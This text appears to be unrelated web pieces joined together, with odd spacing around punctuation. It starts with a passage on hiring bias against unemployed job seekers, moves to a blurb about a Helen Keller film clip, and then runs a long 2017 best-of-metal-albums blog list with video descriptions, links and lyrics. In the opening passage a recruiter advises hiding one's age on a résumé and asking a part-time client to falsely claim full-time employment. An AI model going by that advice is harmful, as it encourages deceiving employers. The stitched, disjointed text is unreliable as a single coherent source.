After all , it takes a lot longer than just searching the Monster resume file !
The bias extends from front - line workers to senior managers .
Charlie Wilgus , managing partner of executive search for Lucas Group , based in Atlanta , says a manufacturing client looking for a division president recently refused to consider a former divisional president at Newell Rubbermaid Inc. whose department had been eliminated .
The client does n’t want candidates who have been laid off , Mr. Wilgus says .
Bobby Fitzgerald prefers to hire the already employed even though he gets two dozen or more unsolicited résumés each day at his White Chocolate Grill .
Employers ’ preference for the employed adds another hurdle for those who have been laid off .
Job seekers frequently are competing with dozens of other applicants for the few available positions .
Bobby Fitzgerald , a partner in five restaurants in three states , says these days he gets two dozen or more unsolicited résumés each day at one of his Phoenix restaurants , the White Chocolate Grill .
But Mr. Fitzgerald says his top candidates , for jobs ranging from servers to management , usually are people who are employed elsewhere .
He currently has 50 openings across his five restaurants and has told recruiters to bring in only people who are working .
Yes , the " unemployed " stigma is another huge hurdle .
No matter how carefully you 'd explain that a candidate was really top - notch , and that the circumstances surrounding their unemployment had nothing to do with them , employers just did n't want to hear it .
( Oh , and they did n't want anyone who was older .
We ignored that - and if they pushed , told them we did n't use illegal practices . )
I 've tried to talk to these people .
I 'd say , " Look , if you hire some superstar away from another company , what you 've hired is someone who 's really in demand and will always be ready to leave you for a better offer .
It 's better to hire a good solid performer who will be loyal because you gave him a break . "
( Occasionally they would listen . )
The other annoying thing that happens during a recession is that employers start demanding all sorts of unrelated skill sets in one person ( figuring they 'll get them to do two jobs for the price of one ) .
I 'd advise you against taking a job like that even if it 's offered - no matter how bad the economy is , it 's not worth the heart attack you 'll probably get .
Now , as a recruiter , I would never advise a candidate to do anything unethical or misleading .
But as a human being , I can tell you : Remove any dates on your resume that indicate your age .
Do n't list every job you ever had , it only makes you look old .
And do n't put down " consultant " as your present employment ( unless you work for a known consulting company ) because most people will assume that means unemployed .
But if you 're doing any part - time consulting for anyone , see if they 'll agree to say you 're working full - time , and list that job title instead .
Do what you can to make it look like you 're already employed .
It 's a jungle out there , guys .
Wow !
From Coilhouse :
Helen Keller – inspiration to generations and inspiration for an entire genre of schoolyard humor – and her teacher and friend Anne Sullivan in a clip from 1930 in which they describe the way in which Helen learned how to speak …
It 's a fascinating little clip which pays homage to a woman who , even beyond her amazing circumstances , was a radical socialist , suffragist , and supporter of birth control , who was friends with the likes of Mark Twain and who worked tirelessly to champion the rights of both the downtrodden and the physically disabled .
This will be the only “ best of ” list I have for 2017 .
Last year I managed lists for metal , electronic music , as well as “ other genres ” .
This year , I have an extra -long metal list , but I did not listen to enough of anything else to make lists , really .
It ’s not clear to me what made me exceptionally receptive to extreme music in 2017 , virtually to the complete exclusion of everything else .
In personal terms , it was a good year .
Not much to complain about , and some good progression in the work life has set up 2018 to see some of the logjam of life “ to - dos ” get un -jammed and moving forward .
In terms of my perspective of the outside world , however , 2017 exceeded my most pessimistic expectations , even as I entered the year rebuking “ thank god 2016 is over ” sentiments .
I recognized worse was to come , but I did not comprehend just how many distasteful , ignorant , and inhospitable things our country had in store .
It has been heartbreaking to watch otherwise intelligent people turn off all critical thinking and embrace a world view that is mean - spirited at best , and open hatred at its worst .
It is crushing to see people adopt bumper sticker slogans in place of critical thought , and the abject abandonment of intellectual honesty in the name of tribalism .
So , yeah , I guess I can see why I felt an unusually strong need for cathartic release .
Best Metal Album of 2017
Woe - Hope Attrition
Abject in Defeat Provided to YouTube by TuneCore Abject in Defeat · Woe Hope Attrition ℗ 2017 Vendetta Released on : 2017 - 03 - 17 Auto - generated by YouTube .
No album will symbolize 2017 for me like Hope Attrition .
In a year of turmoil , unrest , and disbelief at the breakdown of social and political norms , Hope Attrition brilliantly ( and often pointedly and directly ) expresses the resentment and disgust at fascism ’s crawl out of the shadows .
And it does it with some of the most captivating riffs and melodies I have heard on an extreme metal album , bar none .
The bookending tracks , “ Unending Call of Woe ” and “ Abject in Defeat ” stand as pillars of the form , and nearly threaten to overshadow the rest of the album .
Fortunately , the middle of the album holds its own , particularly “ The Ones We Lost ” and “ Drown Us With Greatness ” , the latter clearly inspired by a certain red capped movement .
Chris Grigg ’s dynamic vocals are expressive and emotive , and are the element that takes the music beyond just sounding angry and into more complex emotions : frustration , contravention , disbelief , resignation , and defiance .
And while Grigg is center stage as vocalist and lead guitar , attention also must be given to drummer Lev Weinstein ( of Krallice and so many other bands that , in December , he actually performed a marathon night drumming for 5 different bands , including Woe , called “ Levizalooza ” . )
Weinstein propels the charges forward , then deftly resets the pace in sudden tempo shifts .
Even without the backdrop of the current social landscape , Hope Attrition would be an incredible and impactful album .
With it , it ’s Album of the Year .
and i relent to power
and i relent to fear
and i relent to every force
that tramples without care
and i regret the meaning
ascribed to every life
the loss compounds completely
abject in defeat
The Rest of the Best
Primitive Man - Caustic
PRIMITIVE MAN - " Commerce " ( Official Visualizer Video ) ' Caustic ' is Out Now on CD / 2xLP / CS / Digital Order via Relapse Records Here : http://bit.ly/PMCaustic Subscribe to Relapse Records Channel : http://youtube.com/relapserecords
Order on Bandcamp : https://primitivemandoom.bandcamp.com/
Order on iTunes : http://geni.us/CausticiT
Order on Amazon : http://geni.us/CausticAMZ
Order on Google Play : http://geni.us/CausticGP
Denver ’s nihilistic trio PRIMITIVE MAN return with Caustic , their second full - length offering of soul - crushing blackened doom and noise - ridden claustrophobia .
Recorded and produced at Flatline Audio by Dave Otero ( Cobalt , Cephalic Carnage , Cattle Decapitation ) , Caustic is 12 songs and 75 + minutes of bloodcurdling howls , abysmal tones and dense , unsettling feedback spewing forth a cesspool of utter misery .
With lyrical themes ranging from political corruption , personal struggle and the crumbling social climate facing the world today , Caustic serves as a cataclysmic soundtrack for a world gone awry .
Video by Frank Huang ( Max Volume Silence ) Official Links : Primitive Man Official Website : https://primitivemandoom.com/
Primitive Man on Facebook : https://www.facebook.com/primitivemandoom
Primitive Man on Twitter : https://twitter.com/PRIMITIVEMANE
Primitive Man on Instagram : https://www.instagram.com/primitivemandoom/
http://www.relapse.com
http://www.facebook.com/relapserecords
http://www.relapserecords.bandcamp.com
http://www.twitter.com/relapserecords
https://www.instagram.com/relapserecords
Lyrics : Cold Shackled to The bottom
Of the bottle Of the socio economic slavery That rules
And runs my life Combust Let smoke fill my lungs Taught lies Work to ruin Infected with poverty Left in the gutter Over worked Under paid From a system meant to fail us Nothing left But to hang our hopes out to try Hell comes home From the time clock to the death bed
When death grips your hands
And kisses them goodbye Remember None of your work days mattered A lifetime spent tonguing
The asshole of all your superiors
Nothing is real
But the inevitability of your cold fucking death
And your heart being ripped from your chest Placed into the cavity of another worker bee Another fucking wage slave Paycheck to paycheck
Your essence is dead but slavery is forever
Oh Jesus .
This album is pure human misery distilled into 75 minutes of music .
Caustic is probably the most aptly named album ever .
It ’s intense and suffocating , and perfectly content to slowly gut - punch you repeatedly over its lengthy run time .
It does not offer the kind of artful release from someone like YOB , it does not sound like a tribal force of nature being conjured like Neurosis .
It sounds like Hell , like you ’ve walked through a door and into a nebulous formless place with incessant , indiscriminate howls , unidentifiable as anything but raw misery .
As a rabid fan of this kind of music , this is one of those sorts of releases that makes me step back and ask myself , “ should I be enjoying this so much ? ”
That I find this sort of torturous assault so aesthetically pleasing is disturbing in its own right .
Nothing is real
but the inevitability of your cold fucking death
and your heart being ripped from your chest
placed into the cavity of another worker bee
another fucking wage slave
paycheck to paycheck
your essence is dead but slavery is forever
Celeste - Infidèle(s )
CELESTE - Sombres sont tes déboires ( 2017 ) Denovali / Tokyo Jupiter Records
Direct links are provided to purchase ' Infidèle (s ) ' on CD , vinyl and digital format .
Links are also given for Celeste , Denovali and Tokyo Jupiter Records .
" Sombres sont tes déboires " is the fourth song on the album .
' Infidèle (s ) ' release date - September 29th , 2017 .
CD / vinyl / merchandise ( Denovali webstore ) https://denovali.com/store/index.php?main_page=advanced_search&s=den286 CD ( Tokyo Jupiter Records )
http://jstore.tokyojupiterrecords.com/items/7759266
Digital format ( Denovali digital store )
https://www.denovali.com/digitalstore/index.php?main_page=product_info&cPath=999&products_id=3282
Digital format ( Celeste / Denovali , Bandcamp ) https://celestes.bandcamp.com/album/infid-le-s
Celeste ( Facebook )
https://www.facebook.com/celesteband
Denovali ( Homepage ) https://www.denovali.com
Denovali ( Facebook )
https://www.facebook.com/denovalirecords
Denovali ( You Tube ) https://www.youtube.com/user/denovalirecords
Denovali ( SoundCloud ) https://soundcloud.com/denovali
Tokyo Jupiter Records ( Homepage ) http://tokyojupiterrecords.com
Tokyo Jupiter Records ( Facebook )
https://www.facebook.com/tokyojupiter
Promotional purposes sanctioned by Denovali .
I did n’t discover Celeste until earlier this year , and their ( at the time ) most recent album , 2013 ’s Animale (s ) , would be my Album of the Year if it had released in 2017 .
So , since I did not put Infidèle (s ) as Album of the Year , does that mean I think it ’s a lesser album ?
I do n’t think I do believe that .
Rather , I think my ranking is more a function of hearing this after having absorbed two very similar albums in the months prior ( Animale(s ) as well as 2010 ’s Morte (s ) Née(s ) ) .
“ Similar ” is an appropriate word , because Celeste is not a band with a huge amount of range .
They are , however , distinct , not easily mistooken for anyone else .
They play a ferocious brand of blackened sludge , easily among the very heaviest and most intense albums on this list .
The guitar tones are abrasive and dissonant , the tremolo picking creating a persistent howl , over which the raging vocals pierce and stab at the listener .
Celeste are masters at gnawing at the listener with rapid - fire blast beats and those searing vocals , and then dropping the vocals and dialing back the drum tempo for instrumental stretches which are still wall - of - sound loud , but feel like absolute relief in comparison .
The back - and - forth pattern of abuse and rest pretty much defines the structure of a typical Celeste album , this one included .
It ’s a challenging , exhausting listen , not something put on in the background .
But the beatings are delightful .
Despite the relentless and punishing nature of the band ’s sound , it ’s the amount of melody that they work in that pushes their work into a special class .
Woven through the blankets of sound are sneaky hooks that call out through the noise .
This is very much in line with their lyrical content , which although generally lost on me due to being completely French ( so much for high school language class ) , reviews and translated readings have revealed that their themes trend towards real - world themes of sorrow and abuse survival , with faint strands of hope that shine through the misery .
Morte(s ) Née(s ) was a concept album about the kind of abuse women are subjected to in modern society , while Animale (s ) was a “ bleak story of a boy and a girl , a kind of love story with a tragic ending ” , quoting the band ’s Bandcamp page .
Infidèle (s ) does not seem to be a concept album like those two , but explores similar themes in a more individual manner .
This group has rocketed up onto my list of favorite bands , and this album should be on a lot more year - end lists than it is .
Progenie Terrestre Pura - oltreLuna
Deus Est Machina Provided to YouTube by Catapult Reservatory , LLC Deus Est Machina · Progenie Terrestre Pura OltreLuna ℗ 2017 avantgarde music Released on : 2017 - 05 - 31 Auto - generated by YouTube .
This is an incredible album , and I do not for the life of me understand why this album has not earned more attention .
PTP blend progressive and industrial metal with atmospheric black metal flourishes .
The mix is a unique sound of metal instrumentation interwoven with electronics that shape and color the sound , rather than existing as separate elements .
The album deftly moves between brilliant sequences of progressive riffs , grindy blast - beat sections , calmed atmospheric lulls , and back again .
The atmospherics bring to mind some of the things Bear McCreary did on the Battlestar Galactica soundtrack , with flute , didgeridoo , female vocals , and hand drum sections building up to an explosion back into the main event .
One of the real stars here is the pristine production that is packed with detail .
Maybe that ’s why it has n’t garnered more attention in a genre that seems to think sounding like you ’re playing inside of a tin can is a virtue .
Actually , it seems more likely that it ’s just because the album is in Italian , and the English language coverage of it has been relatively limited .
Variabile inattesa ,
con data di scadenza ,
l 'universo è l'uscita .
La grande luna mi guida
attraverso un ultimo viaggio
Un ultimo viaggio , oltreLuna
Dodecahedron - kwintessens
Dodecahedron - Hexahedron - Tilling The Human Soil ( Official Premiere )
Taken from the forthcoming album " kwintessens " .
Release date : March 17th , 2017 Pre-order here : http://smarturl.it/SOMeshop Follow Dodecahedron : https://www.facebook.com/ddchdrn/
Follow Season of Mist : http://www.season-of-mist.com
http://www.facebook.com/seasonofmistofficial
http://www.youtube.com/user/SeasonOfMistLabel https://www.instagram.com/seasonofmistofficial/
https://twitter.com/seasonofmist
The most mind - bending , brain - breaking album in a year full of challenging avant - garde metal .
Kwintessens is a staggering , swirling , disorienting ride .
The riffs come from every direction , angular and dissonant , simultaneously memorable and incomprehensible .
For an album with so many twists and turns , it ’s shocking just how cohesive it is .
The dark , hazy sonic palette serves as the backbone from which the winding sonic excursions spring .
This is truly one of the most meticulously crafted albums of the year , and it is completely captivating for its entire 41 minute runtime .
This is what will start the cure
Man ’s wisdom , either through god ’s revelation ,
or through the service of the angels and the spirits ,
or through the sharpness and the depth of understanding
Ufomammut - 8
UFOMAMMUT - Warsheep PRE ORDER WARSHEEP 7 " on https://www.supernaturalcat.com/store
FOR AMERICAN CUSTOMERS PLEASE PRE ORDER VIA NEUROT RECORDINGS
https://neurotrecordings.merchtable.com
Prior to the album 's release , the trio delight fans with an early extract from the record in the form of a video for the song " Warsheep "
The band describe their intentions of the video ... " it is inspired by the lyrics of the song which in itself is a play on the words " Worship " .
The protagonist takes a symbolic journey from the natural human condition to the trappings of the dogmas of society , religion etc .
The principle idea being that thought is blind and is caged into the illusion of being free . "
Adding to the video's eerie atmosphere , the setting is in an abandoned villa in Italy , and the surrounding woodland .
In a year where Electric Wizard came out and disappointed ( scroll down ) , Ufomammut was there to step in with an especially fuzzy , filthy version of their psychedelic stoner doom .
Whereas their last ( brilliant ) album , Ecate , leaned in a spacier direction , 8 comes down to earth and ratchets up the power an extra notch .
The album is deceptively complex .
Fuzzy doom metal is n’t usually the home of tricky time signature changes , but Ufomammut takes their fuzzed - out guitar chugging and throws things off - kilter with some unexpected changes , adding an additional disorienting factor to the blanketing haze .
This is also perhaps Ufomammut ’s best songwriting to date .
As delightful as Ufomammut ’s chugging has always been , and still is here , the melodies and compositions change up and take left turns a bit sooner than on previous efforts , avoiding staying locked into the same general patterns for as long as they might have in the past .
All the thoughts I have are wandering
All the things I see are so unreal
All I ever touch just disappear
All feelings are crumbling in my maze
Ingurgitating Oblivion - Vision Wallows in Symphonies of Light
Amid The Offal , Abide With Me Provided to YouTube by Universal Music Group North America Amid The Offal , Abide With Me · Ingurgitating Oblivion Vision Wallows In Symphonies Of Light ℗ ℗ 2017 Willowtip Records Released on : 2017 - 05 - 12 Producer : Florian Engelke Producer : Adrian Bojarowski Author , Composer : Florian Engelke Author , Composer : Adrian Bojarowski Auto - generated by YouTube .
That band name though .
This was a great year for avant - garde death and black metal in the Gorguts and Deathspell Omega traditions .
Ingurgitating Oblivion is very hard to describe , outside of saying that fans of Gorguts and similar bands must check it out .
It ’s heavy , atonal , and odd , but never gets lost in its own oddness .
The rhythm section is just amazing - this is some of the most amazing drumming you ’re gonna hear on a metal album all year .
And woven throughout all of the brain - bending left turns and buildups are some surprisingly sticky melodies .
I ’d like to rave about the album , but I lack the words to describe it .
At first glance , it ’s simply another ( great ) angular technical death metal album , but it opens up so much as you dive deeper into it .
King Woman - Created in the Image of Suffering
KING WOMAN - " Deny " ( Official Music Video ) KING WOMAN - " Deny " ( Official Music Video ) From the new album ' Created in the Image of Suffering , ' out now on CD / LP / Digital via Relapse Records .
Order Here : http://bit.ly/KingWoman Subscribe to Relapse Records Channel : http://bit.ly/RelapseYouTube
Order on Bandcamp : https://kingwoman.bandcamp.com/
Order on iTunes : http://geni.us/KingWomaniT
Order on Amazon : http://geni.us/KingWomanAMZ
Order on Google Play : http://geni.us/KingWomanGP
Official Links : King Woman on Facebook : https://www.facebook.com/KNGWMN/
King Woman on Twitter : https://twitter.com/kngwmn/
King Woman on Instagram : https://www.instagram.com/kngwmn/
King Woman on Bandcamp : https://www.kingwoman.bandcamp.com/
http://www.relapse.com
http://www.facebook.com/relapserecords
http://www.relapserecords.bandcamp.com
http://www.twitter.com/relapserecords
https://www.instagram.com/relapsereco...
Lyrics : I know the spirit Etiquette I 'd wash your feet with My dirty hair Jesus I love you With all my heart
But I feel like an angel I 'm lacking the star I 'm lacking the spirit I 'm losing the heart I 'm lacking the spirit I pray my mother Wo n't you ever find a cure ?
Throw back odd pill Find euphoria I once knew Am I so dulled down ?
Am I a whitewashed wall ?
So dirty on The inside ?
I know the spirit Etiquette I 'd wash your feet with My dirty hair And you know I love you With all my heart
But I feel like an angel I 'm lacking the star I pray my mother Wo n't you ever find a cure ?
Throw back odd pill Find euphoria I once knew Am I so dulled down ?
Am I a whitewashed wall ?
So dirty on The inside ?
I pray my mother wo n't you ever find a cure ?
Throw back odd pill find euphoria I once Am I so dulled down ?
Am I a whitewashed wall ?
So dirty on The inside ?
Created in the Image of Suffering is vocalist Kristina Esfandiari ’s takedown of her Coptic Christian cult - like upbringing .
Far from a rebuke of religion in general , though , Esfandiari ’s sights seem set on hypocritical practitioners , and trying to make sense of her treatment within that environment .
The lyrics are deeply personal , and the vocals evoke the dulled pain of a survivor reflecting on their past trauma .
The instruments here largely create a thick haze , shoegazey take on doom .
The riffs are occasionally powerful but rarely crushing , opting instead to paint an ethereal soundscape for Esfandiari ’s vocals to call out from behind .
The effect it creates is like the aural version of the desaturated “ flashback ” scenes in a movie - some of the details lost to time , but the gist of it still clear as day .
Also , unrelated to this album , but Esfandiari took stage with
Thou earlier this year , and helped them kick off their set with a cover of Nirvana ’s “ Something in the Way ” , and it just makes me wish for a whole album of Esfandiari singing Cobain ’s most mumbley Nirvana songs .
I wish somebody would have told me
Cuz the past you ca n’t get back
Feels like somebody wore me
There ’s a deliverance I lack I ca n’t remember everything
You break the bread you drink the wine
You were a bad man
You break the bread you drink the wine
Fister / CHRCH - Split
Temples Provided to YouTube by The Orchard Enterprises Temples · CHRCH Fister / CHRCH Split ℗ 2017 Crown and Throne Ltd. / Battleground Released on : 2017 - 11 - 17 Auto - generated by YouTube .
CHRCH ’s Unanswered Hymns was one of my absolute favorite albums of 2015 .
It was an immensely thick , sludgy take on doom , splashing around the same mucky pool as obvious influence Bell Witch .
In lieu of a new album ( make one already ! ) , here we get a split with kindred spirits Fister , each group contributing a single 16 + minute track to the collaboration .
CHRCH ’s track feels like a direct continuation of the work on Unanswered Hymns : tension builds and releases between crushing wall of sound segments and quieter funeral passages , and vocalist Eva Rose ’s tortured shrieks giving the whole thing an edge .
But whereas CHRCH exhibits a bit of artfulness that shines through the ugliness , Fister steps in and amplifies the bludgeoning with a howling , unforgiving dirge .
Vocalist Kenny Snarzyk sets the tone here - whereas CHRCH ’s Eva deploys her shrieks tactically , Snarzyk makes his the central bricks of the band ’s wall of sound .
The assault lasts the first 7 minutes of the 20 minute track , before a frenetic psychedelic section gives way to quiet , hypnotic guitar picking that eventually builds back up to a second Snarzyk vocal pummeling that closes out the track .
Chelsea Wolfe - Hiss Spun
Chelsea Wolfe - Spun ( Official Video ) Chelsea Wolfe 's " Spun " from the album " Hiss Spun " released September 22 , 2017 on Sargent House .
Chelsea Wolfe on tour - http://chelseawolfe.net/shows
iTunes : http://smarturl.it/CWHissSpun_iTunes
Spotify : http://smarturl.it/CWHissSpun_Spotify US CD/LP Store : https://www.hellomerch.com/collections/chelsea-wolfe
UK & EU CD /LP Store : http://sargenthouse.awesomedistro.com...
Bandcamp : http://chelseawolfe.bandcamp.com
http://chelseawolfe.net
http://facebook.com/cchelseawwolfe
http://twitter.com/cchelseawwolfe
http://instagram.com/cchelseawwolfe
http://sargenthouse.com/chelsea-wolfe
VIDEO CREDITS : Directed by Chelsea Wolfe Editing / light design : Ben Chisholm Dancer : Felicia Drake // sedusastudio.com Clothing : Jenni Hensler costume design , Micol Ragni ( boots , coat ) DSTM Makeup : Kelly Carmichael Hair : Sarah Scherer Special thanks to Jessica Brown , Lance Jackman , Ella Cross , and On The Y for letting us fuck around in your limo !
Spun lyrics : I LIFT MY EYES , I SLOW MY GAIT AND I NEVER WANT TO SEE YOU AGAIN YOU LEAVE ME RESTLESS , YOU LEAVE ME HUNG YOU LEAVE ME COILED YOU LEAVE ME SPUN AWAKEN IN A TANGLE OF WIRE I SLEPT DESPERATE , TRYING TO REACH YOU YOU LEAVE ME RECKLESS , YOU LEAVE ME SICK I DESTROY MYSELF AND THEN I WANT IT AGAIN SPUN HEAVY LOVE COILED AND SPUN A BRUTE , AN ANGEL , AND A MADWOMAN A MOST ELEGANT IMPEDIMENT WAS THERE FROM THE START WAITING AND REPEATING WITHIN ME WAITING AND REPEATING MY PROBLEM IS THEIR DOWNTHROW AND UPHEAVAL AND MY ENQUIRY IS AS TO THEIR WORKING AND MY EFFORT IS THEIR SELF - EXPRESSION BUT I WAS ONLY ROCK , DUST , WATER AND ICE AND ANIMAL INSTINCTS ALL ALONG THE HYPEROSMIA AND THE BASE SENSE THE PRODROME AND THE AURA THE SHADOWS AND THE SLEEP DEPRIVATION THE TRICHOMES AND THE DELIRIANTS CUT THROUGH THE FEAR CONDITIONING TO FINALLY UNDERSTAND IT WAS ALL AND EVERYTHING OR NOTHING AND ALL AND EVERYTHING OR NOTHING .. //
Ben Chisholm : guitar , bass Troy Van Leeuwen : lead guitar Chelsea Wolfe : vocals Jess Gowrie : drums
Chelsea
Wolfe got on my radar with her previous album , Abyss , but nothing she ’s done before holds a candle to Hiss Spun .
Wolfe occupies a sonic area that straddles boundaries between doom metal , goth , industrial , shoegaze , and dream - pop , without ever staking a flag in any one ’s territory .
Her recent albums have moved the needle slightly more in the doom metal direction , coinciding with her finding a larger audience in that corner of the music world .
That said , album opener “ Spun ” could go right onto My Bloody Valentine ’s “ Loveless ” .
The third track “ Vex ” is the one that grabbed me first , even before the guest vocals from Aaron Turner came in ( and instantly made me wish for an entire collaboration album between the two ) .
At its core , the music is simple , uncomplicated .
But it is so expertly crafted that simple things like a slight change in Wolfe ’s vocal tone reverberates through the song .
Most importantly , though it sounds like music that takes from a lot of identifiable influences , it does n’t sound like music you ’ve listened to before .
It never fails to surprise .
Also , Chelsea has Neurosis ’s Through Silver in Blood on her 5 favorite metal albums list .
As a bonus , here ’s a mini- documentary produced by Revolver from Chelsea ’s tour this year with opener Youth Code. ( source )
no turning back
“ only god knows what we ’re headed for ”
the flowers bloom
the sun rises flux
hiss
welt
groan
Bereft - Lands
BEREFT - WE WEPT ( official album track )
Order here : http://smarturl.it/BEREFT13
BEREFT weave elements of doom and black metal into exhaustive , dynamic songs , creating their own style of powerful metal , unbound to any genre and fully conscious of the impression .
Bereft brings forth the kind of grand , cavernous doom that you might expect from someone like Inter Arma , while sprinkling in some blast - beat black metal excursions to kick the tempo up and keep things from getting bogged down .
Not that the album necessarily needs the high tempo changeups , as the spacious , exploratory doom is never really in danger of outstaying its welcome .
But the changeups are welcome in that they are brilliantly executed and surprisingly seamless , and give Bereft their own unique fingerprint of the genre they inhabit .
Amenra - Mass VI
Amenra " Children Of The Eye " ( official videoclip ) Amenra " Children Of The Eye " Director : Wim Reygaert DOP : Maximiliaan Dierickx Sculptures : Isabelle De Vos Art Direction : Najib De Brackenier Styling : Isabelle De Vos Edit : Wim Reygaert Colour grading : Maximiliaan Dierickx " Children of the eye " MASS VI Preorder now on http://consouling.be/release/mass-vi
Lyrics : no one ever will leave me behind .
I cast no shadow .
light is too profound .
I am the way .
All stars align .
a new reign .
uncrowned .
with wounds adorned , we stand in line .
river of blood leads to the shrine .
hand in hand , side by side .
we look our gods dead in the eye .
shaved for burial .
soul lost inside .
anoint my skin , nothing to hide .
I take the first step in the funeral pyre .
a fire upon me .
reside in me .
I am the cold .
the barren tree .
reside in me .
I am the fire no one can oversee .
truth fire .
not unto me .
one tear at a time , you are a threat to mine .
flood trenches .
dredge remnants of my past .
wash away my longing for me to be the last .
come rain , wash us all away .
here come the first wave , nothing will remain .
forever more .
no more .
too cold to drown in .
the deep .
allowed in .
no more .
Recorded and mixed by Billy Anderson Mastered by Justin Weiss www.ritualofra.com www.facebook.com/churchofra www.churchofra.com
This is the kind of album I would have been even more into when bands like Neurosis and ISIS were introducing me to the word of extreme metal - at least , if I were ready for the falsetto vocals at that time .
Post - metal was my way in , and this album brings me back to those early discoveries .
As it is , it still is one of my favorites of the year , a deeply affecting album .
It ’s massive sounding , creating a thick atmosphere that I just want to wrap myself inside of .
It builds and builds over the album ’s 41 minutes , making it hard to listen to in chunks .
Whereas Primitive Man evokes a sense of neverending misery , Amenra brings forth a sense of looking into oblivion , into nothingness .
It brings to mind prayers and rituals going unanswered , doubts about what is really waiting on the other side .
The ending seconds of the album , in which the wall of sound sharply gives way to silence , is heart - dropping .
In terms of the basic elements , anyone that has listened to Amenra before , or even the post - metal bands that inspired them , wo n’t find anything shocking here .
But it is an amazing execution of that subgenre , filtered through Amenra ’s trademark spiritual bent .
with wounds adorned , we stand in line
river of blood leads to the shrine
hand in hand , side by side
we look our gods dead in the eye
Artificial Brain - Infrared Horizon
Artificial Brain - Absorbing Black Ignition [ Official Video ] Artificial Brain - " Absorbing Black Ignition " Sound Produced by Colin Marston & Artificial Brain Recorded and Engineered by Colin Marston at Menegroth : The Thousand Caves , In Queens NY .
Video Director - Tim Mearini Additional Models - Nick Govacko Links profoundlorerecords.bandcamp.com/album/labyrinth-constellation facebook.com/ArtificialBrainMusic timmearini.com / artstation.com /artist/crashmgn
Lyrics Gemini – twin of two extremes Symmetry – polarized at the seam
The side of dirt – an animal ignited
The side of the vacuum – existing in psychic “ Flesh is just mud , until tempered with fire Heaving balance , a dimension of fibers ”
Summoning energy , twins of darkness and light Grey equation , charged with blackness beyond nights “ Soil , water , light – temples of the flesh which channel seas of urge . ”
Gemini – twin of two extremes Symmetry – polarized at the seam “ Flesh is just mud , until tempered with fire Heaving balance , a dimension of fibers ”
A sci-fi dystopian concept album .
Thankfully , one that goes about it in a very different way than The Astonishing .
Here , Artificial Brain ’s avant - garde death metal evokes bleak landscapes littered with mechanical refuse .
In an interview with Noisey , vocalist Will Smith states that he grew up as a huge fan of the Terminator movies , and that clearly informs the tone here .
It ’s a very direct album - whereas many of the other avant - garde albums on this list lean towards longer pieces , Infrared Horizon features briefer , snappier tracks which nevertheless maintain a very consistent tone throughout , creating a steady album flow .
Still , the shorter song lengths make the end result different than an album of 10 - 20 minute tracks .
Bell Witch - Mirror Reaper
BELL WITCH - Mirror Reaper ( excerpt / official audio )
Taken from the album " Mirror Reaper " out Oct 20 , 2017 Pre-order " Mirror Reaper " here : www.profoundlorerecords.com/bellwitch
http://www.profoundlorerecords.com
http://www.facebook.com/profoundlorer...
twitter : @profound_lore Instagram : https://www.instagram.com/profoundlor...
BELL WITCH on : Facebook : https://www.facebook.com/BellWitchDoom/
Instagram : https://www.instagram.com/bellwitchdoom/
Twitter : @bellwitchdoom BELL WITCH on tour this fall ( w / Primitive Man ) : 10/25 - Denver CO @ Hi Dive 10/26 - Omaha , NE @ The Milk Run 10/27 - Chicago IL @ Cobra Lounge 10/28 - Rock Island IL @ Rock Island Brewery 10/29 - Hamtramck , MI @ The New Dodge 10/30 - Columbus , OH @ Ace Of Cups 10/31 - Pittsburgh , PA @ Brillobox 11/01 - Toronto , ON @ Coalition
11/02 - Montreal , QC @ Bar Le Ritz
11/03 - Portland , ME @ Geno ’s
11/04 - Oneonta , NY @ Cop Frat 11/05 - Boston , MA @ ONCE 11/06 - Brooklyn , NY @ Saint Vitus Bar 11/07 - Philadelphia , PA @Kung Fu Necktie
11/08 - Montclair , NJ @ Meat Locker
11/09 - Baltimore , MD @ Sidebar 11/10 - Richmond , VA @ Strange Matter 11/11 - Atlanta , GA @ Drunken Unicorn
11/12 - Nashville , TN @ Exit / In 11/13 - Little Rock , AR @ Whitewater
11/14 - Memphis , TN @ Growlers 11/15 - New Orleans , LA @ Santos 11/16 - Austin TX @ Lost Well 11/17 - Forth Worth TX @ Ridgelea Lounge
Bell Witch builds on their minimalistic sonic palette ( bass , drums , vocals ) and adds in - nope , still not guitar - a Hammond organ .
Dylan Desmond ’s 6 - string bass work has to be heard .
It does n’t sink in at first that it ’s not a guitar ,
The 83 - minute single track album is lengthy , but Bell Witch does n’t go for “ epic ” .
This is pensive , meditative , personal .
It may drone but it rarely turns into an “ atmospheric ” piece .
Rather , it remains firmly rooted in a very human sadness as it patiently descends deeper into its aural abyss .
In a way , this is like the yin to Primitive Man ’s yang .
dry the waves
anchor ice
mirror reaper
arrowed eyes
Pyrrhon - What Passes For Survival
Goat Mockery Ritual Provided to YouTube by Universal Music Group International Goat Mockery Ritual · Pyrrhon What Passes For Survival ℗ ℗ 2017 Willowtip Records Released on : 2017 -08 - 11 Producer : Dylan DiLella Producer : Erik Malave Producer : Steve Schwegler Producer : Doug Moore Author , Composer : Dylan DiLella Composer , Author : Erik Malave Author , Composer : Steve Schwegler Author , Composer : Doug Moore Music Publisher : Doug Moore Music Publisher : Dylan DiLella Music Publisher : Erik Malave Music Publisher : Steve Schwegler Auto - generated by YouTube .
This was absolutely one of the hardest albums to absorb this year .
Not that it the journey was n’t enjoyable , because it was .
But this dense , chaotic , angular assault comes from every direction , and changes its heading so frequently that it can be very difficult to get a foothold .
It relly resembles a free jazz album being played by a death metal band .
If the term “ post - rock ” was coined to mean non-rock music played using rock sounds and instruments , then it makes sense when people call Pyrrhon “ post - death ” , as this is a band taking death metal ’s vocabulary , deconstructing it , and using it to make something very different from an old - school death metal album .
That said , death metal is n’t the only subgenre being pulled from , as there ’s clearly a good bit of grindcore and crust punk flowing into the maelstrom here too .
The production is a big part of what makes this album work .
Lesser producing efforts could easily have reduced this into indeciperable mud .
Instead , each instrument is clear and distinct , and are neither compressed into oblivion nor polished to a shimmer .
It takes quite a few spins to start to figure this one out , but it ’s worth it .
He chants the happy victim ’s creed :
“ Let distraction succor me
and polish all my edges down
‘ til I am smooth and blank as stone
to better fill my given role Make me what I am
Make me the servant I was born to be " "
Ex Eye - Ex Eye
EX EYE - " Xenolith ; The Anvil " ( Official Music Video ) EX EYE - " Xenolith ; The Anvil " ( Official Music Video ) ' Ex Eye ' is out now on CD / LP / Digital via Relapse Records Order Here : http://bit.ly/Ex-Eye Subscribe to Relapse Records Channel : http://bit.ly/RelapseYouTube
Directed by Derrick Belcham Order on Bandcamp : https://exeyeband.bandcamp.com
Order on iTunes : http://geni.us/ExEyeiT
Order on Amazon : http://geni.us/ExEyeAMZ
